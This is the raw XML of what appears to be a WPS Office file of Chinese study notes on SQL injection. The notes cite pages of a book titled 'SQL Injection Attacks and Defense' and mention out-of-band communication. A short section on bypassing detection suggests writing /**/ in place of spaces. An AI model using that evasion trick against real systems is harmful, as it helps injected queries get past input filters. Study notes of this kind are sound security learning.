          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>及Oracle和其他带外通信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见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SQL注入攻击与防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>171~P179</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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TODO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>: 《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SQL注入攻击与防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>187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代码层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:p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绕开检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>（7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节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>代替空格</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="28346" w:h="31181"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="851" w:footer="992" w:gutter="0"/>
      <w:cols w:space="0" w:num="1"/>
      <w:rtlGutter w:val="0"/>
      <w:docGrid w:type="lines" w:linePitch="31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BEBD73"/>
    <w:rsid w:val="164B4FC9"/>
    <w:rsid w:val="3DCF3C94"/>
    <w:rsid w:val="6DBEBD73"/>
    <w:rsid w:val="70F247F1"/>
    <w:rsid w:val="7DFD60E5"/>
    <w:rsid w:val="EF5F9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paragraph" w:customStyle="1" w:styleId="6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  <w:style w:type="character" w:customStyle="1" w:styleId="7">
    <w:name w:val="s1"/>
    <w:basedOn w:val="4"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="pingfang sc" w:hAnsi="pingfang sc" w:eastAsia="pingfang sc" w:cs="pingfang sc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258</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <Application>WPS Office_4.6.1.7451_F1E327BC-269C-435d-A152-05C5408002CA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2022-10-20T22:20:00Z</dcterms:created>
  <dc:creator>xiamu</dc:creator>
  <cp:lastModifiedBy>昵称</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-23T10:47:32Z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2052-4.6.1.7451</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>A8551B995C37E023C5E85063A0920C83</vt:lpwstr>
  </property>
</Properties>
</file>